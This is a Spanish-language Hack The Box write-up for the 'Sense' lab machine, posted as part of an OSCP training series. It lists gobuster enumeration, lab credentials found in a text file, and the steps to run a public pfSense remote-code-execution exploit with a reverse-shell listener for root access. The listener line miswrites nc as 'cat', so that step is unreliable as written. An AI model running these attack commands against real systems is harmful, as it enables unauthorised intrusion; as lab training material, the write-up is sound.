Road to OSCP - Hack The Box Write Up - Sense

Blog

22
- Dic
2019
Road to OSCP - Hack The Box Write Up - Sense

Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.

En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.

¡Empecemos con la diversión!

Sense

Initial Foothold

El puerto 80 nos redirige al puerto 443, que tiene un login de PFSense.

Al diablo con esta máquina, tienes que enumerar la página web usando la lista de palabras de dirbuster y buscar para las extensiones de txt: gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u https://10.10.10.60 -k -o gobuster/gobuster_txt.txt -x txt -t 50

Con eso, encontramos system-users.txt que dice:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

Las credenciales reales son: Rohit:pfsense.

De la fuerza bruta del gobuster, también encontramos changelog.txt que dice que hay una vulnerabilidad sin parchear.

Raíz

Al iniciar sesión, vemos la versión para pfsense: 2.1.3.

Haciendo searchsploit pfsense encontramos uno con ejecución remota de código para las versiones < 2.1.4.

  1. Refleja: searchsploit -m 43560.py.
  2. Renombrarlo: mv 43560.py exploit.py.
  3. Poner un puerto escucha: cat -lnvp 12345.
  4. Dispara el exploit: python3 exploit.py --rhost 10.10.10.60 --lhost 10.10.14.31 --lport 12345 --username rohit --password pfsense.
  5. Obtenemos un shell de root.
Ángel Guzmán/Evaluador Junior

Grado y Master en Ingeniería de Tecnologías de Telecomunicación por la Universidad de Granda, especializado en telématica. Se unió a jtsec en noviembre de 2019 como evaluador de ciberseguridad Junior.

Desde su unión a jtsec, ha participado en varios proyectos internos de hardware hacking y ha recibido formación sobre la certificación LINCE.

Su principal motivación es aprender, desde pequeñas herramientas para su trabajo diario hasta nuevas tecnologías.


Contacto

¡Envíanos tus dudas o sugerencias!

Al enviar tus datos nos permites que los usemos para resolver tus dudas enviándote información comercial de tu interés. Los suprimiremos cuando dejen de ser necesarios para esto. Infórmate de tus derechos en nuestra Política de Privacidad.